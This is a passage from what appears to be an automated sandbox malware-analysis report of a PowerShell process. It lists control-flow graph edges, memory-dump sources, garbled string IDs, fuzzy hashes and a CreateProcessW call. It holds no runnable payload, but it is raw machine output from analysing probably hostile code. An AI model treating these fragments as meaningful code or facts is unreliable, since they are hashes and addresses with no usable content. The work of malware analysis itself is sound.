720->730 731 7f0ef5 720->731 726 7f0fde-7f0fe7 721->726 727 7f0fea-7f0ff0 721->727 729 7f0b82-7f0b84 723->729 724->729 735 7f0ff6-7f1002 727->735 736 7f0ff2-7f0ff4 727->736 764 7f0dbd-7f0e14 728->764 765 7f0da7-7f0dad 728->765 729->668 738 7f0b8a-7f0b8c 729->738 739 7f0ef7-7f0ef9 730->739 731->739 744 7f1004-7f1020 735->744 736->744 746 7f0b8e-7f0b9a 738->746 747 7f0b9c 738->747 739->721 748 7f0eff-7f0f01 739->748 751 7f105b-7f1061 743->751 752 7f1071-7f1082 743->752 754 7f0b9e-7f0ba0 746->754 747->754 755 7f0f03-7f0f0f 748->755 756 7f0f11 748->756 757 7f1065-7f106f 751->757 758 7f1063 751->758 754->668 760 7f0ba6-7f0bc6 754->760 763 7f0f13-7f0f15 755->763 756->763 757->752 758->752 786 7f0bde-7f0be2 760->786 787 7f0bc8-7f0bce 760->787 763->721 767 7f0f1b-7f0f1d 763->767 769 7f0daf 765->769 770 7f0db1-7f0db3 765->770 775 7f0f1f-7f0f25 767->775 776 7f0f37-7f0f3b 767->776 769->764 770->764 777 7f0f29-7f0f35 775->777 778 7f0f27 775->778 779 7f0f3d-7f0f43 776->779 780 7f0f55-7f0fcf 776->780 777->776 778->776 781 7f0f47-7f0f53 779->781 782 7f0f45 779->782 781->780 782->780 788 7f0bfc-7f0c00 786->788 789 7f0be4-7f0bea 786->789 791 7f0bd2-7f0bd4 787->791 792 7f0bd0 787->792 796 7f0c07-7f0c09 788->796 793 7f0bee-7f0bfa 789->793 794 7f0bec 789->794 791->786 792->786 793->788 794->788 799 7f0c0b-7f0c11 796->799 800 7f0c21-7f0c78 796->800 801 7f0c15-7f0c17 799->801 802 7f0c13 799->802 801->800 802->800
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe
                                                                              • API String ID: 0-208933372
                                                                              • Opcode ID: 0cb9931daa012820635ec1a1a491957895bb17e08fd75af18531d118b5ec279a
                                                                              • Instruction ID: 140b0aa89e0aed9c436c0f0ad8ebdf32caf7edc9cbe97022a86fecbcd12bccd9
                                                                              • Opcode Fuzzy Hash: 0cb9931daa012820635ec1a1a491957895bb17e08fd75af18531d118b5ec279a
                                                                              • Instruction Fuzzy Hash: 36E10331B04309CFDB259B64C8506BABBE2AF91310F2484AADA59DB353DB39DD41C7E1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 934 7f1998-7f19aa 935 7f19ac-7f19b8 934->935 936 7f19ba 934->936 937 7f19bc-7f19be 935->937 936->937 938 7f1a6d-7f1a77 937->938 939 7f19c4-7f19cb 937->939 940 7f1a79-7f1a82 938->940 941 7f1a85-7f1a8b 938->941 942 7f1ac7-7f1aff 939->942 943 7f19d1-7f19d6 939->943 944 7f1a8d-7f1a8f 941->944 945 7f1a91-7f1a9d 941->945 952 7f1ba8-7f1bb2 942->952 953 7f1b05-7f1b1d 942->953 946 7f19ee-7f1a05 943->946 947 7f19d8-7f19de 943->947 949 7f1a9f-7f1aba 944->949 945->949 946->942 957 7f1a0b-7f1a2b 946->957 950 7f19e2-7f19ec 947->950 951 7f19e0 947->951 950->946 951->946 959 7f1bbd-7f1bc3 952->959 960 7f1bb4-7f1bba 952->960 965 7f1bf9-7f1c44 953->965 966 7f1b23-7f1b28 953->966 972 7f1abd-7f1ac2 957->972 973 7f1a31-7f1a3a 957->973 962 7f1bc9-7f1bd5 959->962 963 7f1bc5-7f1bc7 959->963 964 7f1bd7-7f1bf6 962->964 963->964 980 7f1c4a-7f1c51 965->980 981 7f1ce5-7f1cef 965->981 970 7f1b2a-7f1b30 966->970 971 7f1b40-7f1b4a 966->971 975 7f1b34-7f1b3e 970->975 976 7f1b32 970->976 984 7f1b4f-7f1b60 971->984 972->973 978 7f1a3c-7f1a42 973->978 979 7f1a54-7f1a67 973->979 975->971 976->971 982 7f1a46-7f1a52 978->982 983 7f1a44 978->983 979->938 990 7f1c55-7f1c64 980->990 991 7f1c53 980->991 986 7f1cfd-7f1d03 981->986 987 7f1cf1-7f1cfa 981->987 982->979 983->979 984->965 996 7f1b66-7f1b6b 984->996 993 7f1d09-7f1d15 986->993 994 7f1d05-7f1d07 986->994 999 7f1c66-7f1c71 990->999 1000 7f1c73-7f1cb9 990->1000 991->990 997 7f1d17-7f1d34 993->997 994->997 1001 7f1b6d-7f1b73 996->1001 1002 7f1b83-7f1ba5 996->1002 1004 7f1cd9-7f1ce2 999->1004 1017 7f1cbb 1000->1017 1018 7f1cc5-7f1ccf 1000->1018 1005 7f1b77-7f1b81 1001->1005 1006 7f1b75 1001->1006 1005->1002 1006->1002 1020 7f1cc0 1017->1020 1019 7f1cd1 1018->1019 1018->1020 1019->1004 1020->1018
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: <{$4`Ne$h<{$h<{$he
                                                                              • API String ID: 0-4046113898
                                                                              • Opcode ID: 14e131e837b5e926b411164a124dc17f015dd6a6781a8e2981032002f8fefbab
                                                                              • Instruction ID: 795479978281623715881a68de1a442804ad8e29bdfc40bbc271415db6aee222
                                                                              • Opcode Fuzzy Hash: 14e131e837b5e926b411164a124dc17f015dd6a6781a8e2981032002f8fefbab
                                                                              • Instruction Fuzzy Hash: 18B12431B04258DFD7159B64C890B7ABBA2EFC5310F58C0AADA09DB392DB39DD01C7A1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1021 7f28d0-7f28f6 1022 7f28fc-7f2901 1021->1022 1023 7f2aa2-7f2abd 1021->1023 1024 7f2919-7f291d 1022->1024 1025 7f2903-7f2909 1022->1025 1043 7f2abf-7f2ac6 1023->1043 1044 7f2ac7 1023->1044 1029 7f2a4e-7f2a58 1024->1029 1030 7f2923-7f2925 1024->1030 1026 7f290d-7f2917 1025->1026 1027 7f290b 1025->1027 1026->1024 1027->1024 1034 7f2a5a-7f2a63 1029->1034 1035 7f2a66-7f2a6c 1029->1035 1032 7f2927-7f2933 1030->1032 1033 7f2935 1030->1033 1040 7f2937-7f2939 1032->1040 1033->1040 1036 7f2a6e-7f2a70 1035->1036 1037 7f2a72-7f2a7e 1035->1037 1042 7f2a80-7f2a9f 1036->1042 1037->1042 1040->1029 1041 7f293f-7f2943 1040->1041 1046 7f2956 1041->1046 1047 7f2945-7f2954 1041->1047 1043->1044 1045 7f2ac8-7f2aea 1043->1045 1044->1045 1049 7f2c1c-7f2c6f 1045->1049 1050 7f2af0-7f2af5 1045->1050 1051 7f2958-7f295a 1046->1051 1047->1051 1073 7f2c87-7f2cda 1049->1073 1074 7f2c71-7f2c77 1049->1074 1053 7f2b0d-7f2b11 1050->1053 1054 7f2af7-7f2afd 1050->1054 1051->1029 1055 7f2960-7f2962 1051->1055 1060 7f2bce-7f2bd8 1053->1060 1061 7f2b17-7f2b19 1053->1061 1056 7f2aff 1054->1056 1057 7f2b01-7f2b0b 1054->1057 1058 7f2964-7f2970 1055->1058 1059 7f2972 1055->1059 1056->1053 1057->1053 1064 7f2974-7f2976 1058->1064 1059->1064 1068 7f2bda-7f2be2 1060->1068 1069 7f2be5-7f2beb 1060->1069 1065 7f2b1b-7f2b27 1061->1065 1066 7f2b29 1061->1066 1064->1029 1071 7f297c-7f297e 1064->1071 1072 7f2b2b-7f2b2d 1065->1072 1066->1072 1075 7f2bed-7f2bef 1069->1075 1076 7f2bf1-7f2bfd 1069->1076 1077 7f2998-7f29a3 1071->1077 1078 7f2980-7f2986 1071->1078 1072->1060 1079 7f2b33-7f2b35 1072->1079 1111 7f2cdc-7f2cfb 1073->1111 1112 7f2d03-7f2d0a 1073->1112 1080 7f2c7b-7f2c85 1074->1080 1081 7f2c79 1074->1081 1082 7f2bff-7f2c19 1075->1082 1076->1082 1089 7f29a5-7f29a8 1077->1089 1090 7f29b2-7f29be 1077->1090 1085 7f298a-7f2996 1078->1085 1086 7f2988 1078->1086 1087 7f2b4f-7f2b51 1079->1087 1088 7f2b37-7f2b3d 1079->1088 1080->1073 1081->1073 1085->1077 1086->1077 1098 7f2b58-7f2b5a 1087->1098 1094 7f2b3f 1088->1094 1095 7f2b41-7f2b4d 1088->1095 1089->1090 1091 7f29cc-7f29dc 1090->1091 1092 7f29c0-7f29c2 1090->1092 1108 7f29de-7f29e4 1091->1108 1109 7f29f4-7f2a4b 1091->1109 1092->1091 1094->1087 1095->1087 1101 7f2b5c-7f2b62 1098->1101 1102 7f2b72-7f2bcb 1098->1102 1106 7f2b66-7f2b68 1101->1106 1107 7f2b64 1101->1107 1106->1102 1107->1102 1113 7f29e8-7f29ea 1108->1113 1114 7f29e6 1108->1114 1111->1112 1116 7f2db3-7f2de0 1112->1116 1117 7f2d10-7f2d15 1112->1117 1113->1109 1114->1109 1137 7f2de5-7f2df9 1116->1137 1119 7f2d2d-7f2d39 1117->1119 1120 7f2d17-7f2d1d 1117->1120 1119->1116 1121 7f2d3b-7f2d56 1119->1121 1123 7f2d1f 1120->1123 1124 7f2d21-7f2d2b 1120->1124 1128 7f2d58-7f2d5e 1121->1128 1129 7f2d70-7f2db1 1121->1129 1123->1119 1124->1119 1130 7f2d62-7f2d6e 1128->1130 1131 7f2d60 1128->1131 1129->1137 1130->1129 1131->1129 1139 7f2dfb-7f2e1a 1137->1139 1140 7f2e22-7f2e5a 1137->1140 1139->1140 1145 7f2e5b 1140->1145 1145->1145
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#Qe$@#Qe$@#Qe$@#Qe
                                                                              • API String ID: 0-1558243600
                                                                              • Opcode ID: 90c0a49eecf051e1ef12d0cd17969f430450c37bfa05e2fbb72105d4c5ae8824
                                                                              • Instruction ID: aaae1cfabf938f18ca4f982e8afbda288e0c98e0bd02468111087ff8f6b15855
                                                                              • Opcode Fuzzy Hash: 90c0a49eecf051e1ef12d0cd17969f430450c37bfa05e2fbb72105d4c5ae8824
                                                                              • Instruction Fuzzy Hash: DFE1D771B04208CFDB25DF64C444ABAB7F2AF85310F6480AAD945AB352DB79DD42CB61

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1242 7f1510-7f1512 1243 7f156c-7f15bc 1242->1243 1244 7f1514-7f1534 1242->1244 1252 7f15be-7f15cc 1243->1252 1253 7f15e9-7f15ee 1243->1253 1250 7f1539-7f1540 1244->1250 1250->1243 1256 7f15d4-7f15e3 1252->1256 1253->1252 1256->1253
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: l;{$l;{
                                                                              • API String ID: 0-2755498750
                                                                              • Opcode ID: a2e77a6436305dec65783e7f406a028798b0d4c09262f24224d58c7478f4f7cd
                                                                              • Instruction ID: f3afa84950805d8ba6ec69fa8b14346eee0f023f3179fbb0c003e9288a20ac7f
                                                                              • Opcode Fuzzy Hash: a2e77a6436305dec65783e7f406a028798b0d4c09262f24224d58c7478f4f7cd
                                                                              • Instruction Fuzzy Hash: F811E374700104ABE714A668C855FBEB396EFC8700F50C069F90ADB3C1CE769D028355

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1257 7f1541-7f15bc 1266 7f15be-7f15cc 1257->1266 1267 7f15e9-7f15ee 1257->1267 1270 7f15d4-7f15e3 1266->1270 1267->1266 1270->1267
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: l;{$l;{
                                                                              • API String ID: 0-2755498750
                                                                              • Opcode ID: 577d989f11d4107fa29045e0820b2d954c28ee2a1f02358beecb3f309cfab5f3
                                                                              • Instruction ID: 1f6a5ad38f112c32578215943ab196bfd4216f887f1c879962db57b32e69ac13
                                                                              • Opcode Fuzzy Hash: 577d989f11d4107fa29045e0820b2d954c28ee2a1f02358beecb3f309cfab5f3
                                                                              • Instruction Fuzzy Hash: D3110E603083C86FE31527344C66FAA2BA59B82B00F4480AAE542CF2D3C8699D458326

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1271 7f1568-7f15bc 1277 7f15be-7f15cc 1271->1277 1278 7f15e9-7f15ee 1271->1278 1281 7f15d4-7f15e3 1277->1281 1278->1277 1281->1278
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: l;{$l;{
                                                                              • API String ID: 0-2755498750
                                                                              • Opcode ID: d85aa938d899eca3c3674e9e64f1379d15363bad26261b224d62172918c6cbc0
                                                                              • Instruction ID: 961a8e7872ebbd2b3a9d09b689611b196f2420c704ec96c07ef1ac2f5b38b819
                                                                              • Opcode Fuzzy Hash: d85aa938d899eca3c3674e9e64f1379d15363bad26261b224d62172918c6cbc0
                                                                              • Instruction Fuzzy Hash: 46F0C2747102486BE62466658819FBF65DA9BD4B00F908068F906AF3C6CDB69D40436A

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1473 739b3c-739bc1 1474 739bc3-739bc6 1473->1474 1475 739bc9-739bd0 1473->1475 1474->1475 1476 739bd2-739bd8 1475->1476 1477 739bdb-739bf1 1475->1477 1476->1477 1478 739bf3-739bf9 1477->1478 1479 739bfc-739c9f CreateProcessW 1477->1479 1478->1479 1481 739ca1-739ca7 1479->1481 1482 739ca8-739d20 1479->1482 1481->1482 1489 739d32-739d39 1482->1489 1490 739d22-739d28 1482->1490 1491 739d50 1489->1491 1492 739d3b-739d4a 1489->1492 1490->1489 1494 739d51 1491->1494 1492->1491 1494->1494
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00739C8C
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.419975672.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_730000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 35669f5e86fa3ef01d92af85ee3679d0f72573b7f982d3c7e19a6ef17a9ab9be
                                                                              • Instruction ID: 43432f4156d9823a291d4611406793573facdb60a17607fe4aea2ef5f0788e90
                                                                              • Opcode Fuzzy Hash: 35669f5e86fa3ef01d92af85ee3679d0f72573b7f982d3c7e19a6ef17a9ab9be
                                                                              • Instruction Fuzzy Hash: 34511971901259DFEF24CFA9C880BDDBBB1BF48304F1485AAE909B7251D7759A88CF60

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1495 73874c-739bc1 1497 739bc3-739bc6 1495->1497 1498 739bc9-739bd0 1495->1498 1497->1498 1499 739bd2-739bd8 1498->1499 1500 739bdb-739bf1 1498->1500 1499->1500 1501 739bf3-739bf9 1500->1501 1502 739bfc-739c9f CreateProcessW 1500->1502 1501->1502 1504 739ca1-739ca7 1502->1504 1505 739ca8-739d20 1502->1505 1504->1505 1512 739d32-739d39 1505->1512 1513 739d22-739d28 1505->1513 1514 739d50 1512->1514 1515 739d3b-739d4a 1512->1515 1513->1512 1517 739d51 1514->1517 1515->1514 1517->1517
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00739C8C
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.419975672.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_730000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 10ce234f0c8846b4f79ca4be507dd9bdc1c51844fda89511e0aa8223703b7737
                                                                              • Instruction ID: 0a6c7c00553c5ddbc9f6f4f25e4830eb0610696437a128062dce3f11c1d73c54
                                                                              • Opcode Fuzzy Hash: 10ce234f0c8846b4f79ca4be507dd9bdc1c51844fda89511e0aa8223703b7737
                                                                              • Instruction Fuzzy Hash: 3B5129B1D01219DFEB24CF99C880BDDBBB5BF48304F1485AAE909B7250D7759A84CF60

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1518 7f0abc-7f0af3 1520 7f0cce-7f0d13 1518->1520 1521 7f0af9-7f0afe 1518->1521 1533 7f0e6a-7f0e85 1520->1533 1534 7f0d19-7f0d1e 1520->1534 1522 7f0b16-7f0b1a 1521->1522 1523 7f0b00-7f0b06 1521->1523 1524 7f0c7b-7f0c85 1522->1524 1525 7f0b20-7f0b24 1522->1525 1527 7f0b0a-7f0b14 1523->1527 1528 7f0b08 1523->1528 1529 7f0c87-7f0c90 1524->1529 1530 7f0c93-7f0c99 1524->1530 1531 7f0b37 1525->1531 1532 7f0b26-7f0b35 1525->1532 1527->1522 1528->1522 1538 7f0c9f-7f0cab 1530->1538 1539 7f0c9b-7f0c9d 1530->1539 1540 7f0b39-7f0b3b 1531->1540 1532->1540 1560 7f0e8f-7f0eb6 1533->1560 1561 7f0e87-7f0e8c 1533->1561 1535 7f0d36-7f0d3a 1534->1535 1536 7f0d20-7f0d26 1534->1536 1544 7f0e17-7f0e21 1535->1544 1545 7f0d40-7f0d42 1535->1545 1541 7f0d2a-7f0d34 1536->1541 1542 7f0d28 1536->1542 1543 7f0cad-7f0ccb 1538->1543 1539->1543 1540->1524 1546 7f0b41-7f0b61 1540->1546 1541->1535 1542->1535 1552 7f0e2f-7f0e35 1544->1552 1553 7f0e23-7f0e2c 1544->1553 1549 7f0d44-7f0d50 1545->1549 1550 7f0d52 1545->1550 1579 7f0b63-7f0b7e 1546->1579 1580 7f0b80 1546->1580 1557 7f0d54-7f0d56 1549->1557 1550->1557 1554 7f0e3b-7f0e47 1552->1554 1555 7f0e37-7f0e39 1552->1555 1562 7f0e49-7f0e67 1554->1562 1555->1562 1557->1544 1563 7f0d5c-7f0d60 1557->1563 1564 7f0ebc-7f0ec1 1560->1564 1565 7f1023-7f1052 1560->1565 1561->1560 1569 7f0d62-7f0d7e 1563->1569 1570 7f0d80 1563->1570 1566 7f0ed9-7f0edd 1564->1566 1567 7f0ec3-7f0ec9 1564->1567 1598 7f1085-7f10ad 1565->1598 1599 7f1054-7f1059 1565->1599 1576 7f0ee3-7f0ee5 1566->1576 1577 7f0fd2-7f0fdc 1566->1577 1573 7f0ecd-7f0ed7 1567->1573 1574 7f0ecb 1567->1574 1575 7f0d82-7f0d84 1569->1575 1570->1575 1573->1566 1574->1566 1575->1544 1584 7f0d8a-7f0da5 1575->1584 1586 7f0ee7-7f0ef3 1576->1586 1587 7f0ef5 1576->1587 1582 7f0fde-7f0fe7 1577->1582 1583 7f0fea-7f0ff0 1577->1583 1585 7f0b82-7f0b84 1579->1585 1580->1585 1591 7f0ff6-7f1002 1583->1591 1592 7f0ff2-7f0ff4 1583->1592 1620 7f0dbd-7f0e14 1584->1620 1621 7f0da7-7f0dad 1584->1621 1585->1524 1594 7f0b8a-7f0b8c 1585->1594 1595 7f0ef7-7f0ef9 1586->1595 1587->1595 1600 7f1004-7f1020 1591->1600 1592->1600 1602 7f0b8e-7f0b9a 1594->1602 1603 7f0b9c 1594->1603 1595->1577 1604 7f0eff-7f0f01 1595->1604 1607 7f105b-7f1061 1599->1607 1608 7f1071-7f1082 1599->1608 1610 7f0b9e-7f0ba0 1602->1610 1603->1610 1611 7f0f03-7f0f0f 1604->1611 1612 7f0f11 1604->1612 1613 7f1065-7f106f 1607->1613 1614 7f1063 1607->1614 1610->1524 1616 7f0ba6-7f0bc6 1610->1616 1619 7f0f13-7f0f15 1611->1619 1612->1619 1613->1608 1614->1608 1642 7f0bde-7f0be2 1616->1642 1643 7f0bc8-7f0bce 1616->1643 1619->1577 1623 7f0f1b-7f0f1d 1619->1623 1625 7f0daf 1621->1625 1626 7f0db1-7f0db3 1621->1626 1631 7f0f1f-7f0f25 1623->1631 1632 7f0f37-7f0f3b 1623->1632 1625->1620 1626->1620 1633 7f0f29-7f0f35 1631->1633 1634 7f0f27 1631->1634 1635 7f0f3d-7f0f43 1632->1635 1636 7f0f55-7f0fcf 1632->1636 1633->1632 1634->1632 1637 7f0f47-7f0f53 1635->1637 1638 7f0f45 1635->1638 1637->1636 1638->1636 1644 7f0bfc-7f0c00 1642->1644 1645 7f0be4-7f0bea 1642->1645 1647 7f0bd2-7f0bd4 1643->1647 1648 7f0bd0 1643->1648 1652 7f0c07-7f0c09 1644->1652 1649 7f0bee-7f0bfa 1645->1649 1650 7f0bec 1645->1650 1647->1642 1648->1642 1649->1644 1650->1644 1655 7f0c0b-7f0c11 1652->1655 1656 7f0c21-7f0c78 1652->1656 1657 7f0c15-7f0c17 1655->1657 1658 7f0c13 1655->1658 1657->1656 1658->1656
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#Qe
                                                                              • API String ID: 0-505644634
                                                                              • Opcode ID: 0408588fa5fa368411975aacf40f7421a34a4a0afd3e1e6ecebeb970dc4bf09b
                                                                              • Instruction ID: 2d5aa19ab3c7ae1fa71effdee04fafc6f107df5e44bf07542b0ee26dec3fd5dc
                                                                              • Opcode Fuzzy Hash: 0408588fa5fa368411975aacf40f7421a34a4a0afd3e1e6ecebeb970dc4bf09b
                                                                              • Instruction Fuzzy Hash: D331D0B4B0020DDFDB209E24C9147BA77A2AF90314F2581AADA149B393DB7DCD81D7E1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#Qe
                                                                              • API String ID: 0-505644634
                                                                              • Opcode ID: 9eb5fca745c5bee56605756c182c9b856e82a24545a8ad1de4cf549f64d9a572
                                                                              • Instruction ID: 4bb6a3e89875edf26d1d3f25bedc3d0d72c983ae8cb885a6029975292647bb62
                                                                              • Opcode Fuzzy Hash: 9eb5fca745c5bee56605756c182c9b856e82a24545a8ad1de4cf549f64d9a572
                                                                              • Instruction Fuzzy Hash: 8321AC30A00209DFDB24DE79C055A7AB7E1AF94350F14806AD6188B310E738DE91CB92
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9b25e10b4ecf25279cfd30f9d335a8c1e1bc7f5d44836599f5278e1c7e4bc8e0
                                                                              • Instruction ID: 697594b6a9126b7bdb84d23429f527a41a234ea67a3c3e0754a3caf8d16dbeac
                                                                              • Opcode Fuzzy Hash: 9b25e10b4ecf25279cfd30f9d335a8c1e1bc7f5d44836599f5278e1c7e4bc8e0
                                                                              • Instruction Fuzzy Hash: BD314C75B002188BD7249774D950BBEB3E2ABC4715F2080BACB419F351CF32DD0287A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.419726760.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_19d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d8eefcf24e04d2ffb52623154b6278d85dfd8209352ff7bafd399b56c80437b6
                                                                              • Instruction ID: a28259d0f68efc8d0090fb9784357f46f712b2ea3cd5295bc70f8182e66af845
                                                                              • Opcode Fuzzy Hash: d8eefcf24e04d2ffb52623154b6278d85dfd8209352ff7bafd399b56c80437b6
                                                                              • Instruction Fuzzy Hash: 1401A271508340EAEB248E25EC84B67FB98EF81764F2CC51AFC495F282C3799945DAB1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.419726760.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_19d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 355a69f2fba5679e20522a75a56019abe2b2646935e13c0f0a1200a8a6977790
                                                                              • Instruction ID: 34a87f464e98976b42d2b51ffd48afab8964a49cda16ed52e107f6961a73a00d
                                                                              • Opcode Fuzzy Hash: 355a69f2fba5679e20522a75a56019abe2b2646935e13c0f0a1200a8a6977790
                                                                              • Instruction Fuzzy Hash: 60F06D71508244AEEB208E16DCC4BA2FB98EB81724F18C55AED885B282C3799C45CAB1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $;{$(:{$(:{$(:{$@#Qe$@#Qe$@#Qe$@#Qe$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:{$L:{$L:{
                                                                              • API String ID: 0-1557587086
                                                                              • Opcode ID: 29cfee9f1e2e904b6143db3dbd33cbf602211751769e9277ab072a5eb5eb896e
                                                                              • Instruction ID: 91f5aeaa5c80f4e1cb34680f707c2525ac4e645565731028bd008102dbcdeeea
                                                                              • Opcode Fuzzy Hash: 29cfee9f1e2e904b6143db3dbd33cbf602211751769e9277ab072a5eb5eb896e
                                                                              • Instruction Fuzzy Hash: 94E11431700248DFDB259B64D854BBE7BA2AFC5311F1480BAEA459B392CB78DD41C7E2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: <4Pe$<4Pe$<4Pe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$P_Oe
                                                                              • API String ID: 0-3195296428
                                                                              • Opcode ID: ab23ad5b6943e4307cfb23dde1d58248bbfb4023817e6a515a878e33673bc862
                                                                              • Instruction ID: aa4cd277fe79686f52d78142e4d37013d9f0346a2bec63467e2d37bb1faeb503
                                                                              • Opcode Fuzzy Hash: ab23ad5b6943e4307cfb23dde1d58248bbfb4023817e6a515a878e33673bc862
                                                                              • Instruction Fuzzy Hash: A6E10571B04748DFD7259B68C850B7ABBA2AFC1311F6480BAD745CB391DA79CC41C7A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$he
                                                                              • API String ID: 0-240446895
                                                                              • Opcode ID: 89276f3a402a55e71a5fdc71d07edbf96687960a2eaecc2695b06b3b9cb692b6
                                                                              • Instruction ID: 998554dc59cf4bf8351b3c6e4d773e58c2c8622d53f450d1ad299edc58655c55
